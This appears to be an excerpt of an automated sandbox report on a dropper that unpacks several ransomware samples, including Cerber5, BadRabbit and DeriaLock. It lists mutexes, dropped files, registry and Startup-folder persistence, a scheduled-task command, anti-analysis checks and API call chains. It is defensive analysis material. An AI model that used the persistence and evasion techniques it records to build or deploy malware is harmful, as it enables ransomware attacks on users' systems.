      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4688:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5632:120:WilError_01
      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\885E71293AD6FDE5
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4116:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3320:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6056:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeMutant created: \Sessions\1\BaseNamedObjects\shell.ipc.{91C2E618-4AEF-670B-529B-DA298DEF0C96}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2844:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2392:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_01
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: irH9zMhZub.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: irH9zMhZub.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: F:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\UI\UI\obj\Debug\UI.pdb source: Endermanch@InfinityCrypt.exe.0.dr
      Source: Binary string: F:\DESKTOP!\ChkDsk\ChkDsk\obj\Debug\PremiereCrack.pdb source: Endermanch@InfinityCrypt.exe.0.dr
      Source: Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 0000002C.00000000.315487934.0000000000DD2000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr
      Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, cscc.dat.3.dr

      Data Obfuscation

      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeUnpacked PE file: 19.2.Endermanch@Cerber5.exe.400000.0.unpack
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeUnpacked PE file: 40.2.Endermanch@Cerber5.exe.400000.0.unpack
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeUnpacked PE file: 58.2.Endermanch@Cerber5.exe.400000.0.unpack
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeUnpacked PE file: 19.2.Endermanch@Cerber5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeUnpacked PE file: 40.2.Endermanch@Cerber5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeUnpacked PE file: 58.2.Endermanch@Cerber5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040D4D8 push esi; ret 19_2_0040D4E8
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040D233 pushad ; retf 19_2_0040D23B
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040C2E5 pushad ; ret 19_2_0040C31B
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040B68F push ecx; ret 19_2_0040B69F
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040CF0B push 01377B4Eh; retf 19_2_0040CF11
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_01570730 push edx; ret 19_2_01570824
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0154635E push ecx; ret 19_2_0154635F
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_01545AD5 push ecx; ret 19_2_01545AE1
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0154554D push esi; ret 19_2_01545568
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0154350D push dword ptr [edi+ecx*4-75h]; iretd 19_2_01543513
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_015425F5 push ecx; ret 19_2_0154267E
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_01544593 push esi; ret 19_2_01544595
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_01540FD0 push 0000000Fh; iretd 19_2_01540FDC
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_015427DF push C25EA208h; ret 19_2_015427F8
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_01540FC7 push 0000000Fh; iretd 19_2_01540FDC
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_015427F9 push C25EA208h; ret 19_2_015427F8
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_01542648 push ecx; ret 19_2_0154267E
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_015466E0 push edx; ret 19_2_015466E1
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_015426B1 push eax; ret 19_2_015426B2
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040D4D8 push esi; ret 40_2_0040D4E8
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040D233 pushad ; retf 40_2_0040D23B
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040C2E5 pushad ; ret 40_2_0040C31B
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040B68F push ecx; ret 40_2_0040B69F
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040CF0B push 01377B4Eh; retf 40_2_0040CF11
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_04DA0730 push edx; ret 40_2_04DA0824
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_04D725F5 push ecx; ret 40_2_04D7267E
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_04D74593 push esi; ret 40_2_04D74595
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_04D7554D push esi; ret 40_2_04D75568
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_04D7350D push dword ptr [edi+ecx*4-75h]; iretd 40_2_04D73513
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_04D766E0 push edx; ret 40_2_04D766E1
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_04D726B1 push eax; ret 40_2_04D726B2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B9016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,3_2_007B9016
      Source: irH9zMhZub.exeStatic PE information: real checksum: 0x0 should be: 0x2c1fa
      Source: Endermanch@Krotten.exe.0.drStatic PE information: real checksum: 0x13aae should be: 0xee00
      Source: Endermanch@DeriaLock.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x82848
      Source: Endermanch@InfinityCrypt.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3cd67
      Source: Endermanch@Birele.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22594
      Source: Endermanch@NoMoreRansom.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1624e8
      Source: Fantom.exe.0.drStatic PE information: real checksum: 0x23bfb should be: 0x42811
      Source: initial sampleStatic PE information: section name: .text entropy: 7.963291049609408
      Source: initial sampleStatic PE information: section name: .text entropy: 7.3467930766155956
      Source: initial sampleStatic PE information: section name: UPX0
      Source: initial sampleStatic PE information: section name: UPX1

      Persistence and Installation Behavior

      Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\Windows\5753.tmp
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile created: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile created: C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile created: C:\Users\user\AppData\Local\Temp\Fantom.exe
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile created: C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe
      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.dat
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile created: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe
      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exe

      Boot Survival

      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run system
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,3_2_007B9534
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
      Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-5779
      Source: C:\Users\user\Desktop\irH9zMhZub.exe TID: 2608Thread sleep count: 68 > 30Jump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exe TID: 2608Thread sleep time: -68000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
      Source: C:\Windows\5753.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
      Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_00408000 GetKeyboardLayoutList followed by cmp: cmp dword ptr [ebp-08h], edx and CTI: jbe 004080DFh19_2_00408000
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_00408000 GetKeyboardLayoutList followed by cmp: cmp esi, eax and CTI: jc 004080C5h19_2_00408000
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_00408000 GetKeyboardLayoutList followed by cmp: cmp dword ptr [ebp-08h], edx and CTI: jbe 004080DFh40_2_00408000
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_00408000 GetKeyboardLayoutList followed by cmp: cmp esi, eax and CTI: jc 004080C5h40_2_00408000
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeAPI coverage: 6.4 %
      Source: C:\Users\user\Desktop\irH9zMhZub.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exeJump to dropped file
      Source: C:\Users\user\Desktop\irH9zMhZub.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exeJump to dropped file
      Source: C:\Users\user\Desktop\irH9zMhZub.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Fantom.exeJump to dropped file
      Source: C:\Users\user\Desktop\irH9zMhZub.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exeJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\cscc.datJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\dispci.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_004063E1 rdtsc 19_2_004063E1
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeEvaded block: after key decision
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,NetServerGetInfo,NetApiBufferFree,3_2_007B7D4E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: memset,memset,GetAdaptersInfo,GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,inet_addr,inet_addr,inet_addr,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,htonl,LocalAlloc,inet_addr,htonl,htonl,CreateThread,CloseHandle,LocalFree,3_2_007B8B2E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,GetComputerNameExW,DhcpEnumSubnets,DhcpGetSubnetInfo,DhcpEnumSubnetClients,htonl,htonl,htonl,inet_ntoa,GetProcessHeap,HeapFree,DhcpRpcFreeMemory,DhcpRpcFreeMemory,3_2_007B8D39
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeAPI call chain: ExitProcess graph end node
      Source: C:\Windows\5753.tmpAPI call chain: ExitProcess graph end node
      Source: rundll32.exe, 00000003.00000002.336952280.00000000042B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Endermanch@Cerber5.exe, 00000013.00000003.395027648.0000000001794000.00000004.00000020.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000002.419847472.0000000001794000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\5753.tmpProcess information queried: ProcessInformation
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B5A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,3_2_007B5A73
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B5E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,3_2_007B5E9F
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_00409857 CoInitialize,GetSystemDirectoryW,SHGetFileInfoW,lstrlenW,SHGetFileInfoW,lstrlenW,SHGetFolderPathW,FindFirstFileW,lstrlenW,CharLowerBuffW,FindNextFileW,FindClose,19_2_00409857
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040A419 wsprintfW,GetFileAttributesW,GetFileSecurityW,GetSecurityDescriptorOwner,EqualSid,GetFileAttributesW,SetFileAttributesW,lstrcatW,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,WaitForSingleObject,lstrlenW,lstrlenW,CharLowerBuffW,Sleep,StrChrW,FindNextFileW,FindClose,19_2_0040A419
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_00401423 lstrlenW,FindFirstFileW,PathMatchSpecW,FindNextFileW,19_2_00401423
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_00409857 CoInitialize,GetSystemDirectoryW,SHGetFileInfoW,lstrlenW,SHGetFileInfoW,lstrlenW,SHGetFolderPathW,FindFirstFileW,lstrlenW,CharLowerBuffW,FindNextFileW,FindClose,40_2_00409857
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040A419 wsprintfW,GetFileAttributesW,GetFileSecurityW,GetSecurityDescriptorOwner,EqualSid,GetFileAttributesW,SetFileAttributesW,lstrcatW,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,WaitForSingleObject,lstrlenW,lstrlenW,CharLowerBuffW,Sleep,StrChrW,FindNextFileW,FindClose,40_2_0040A419
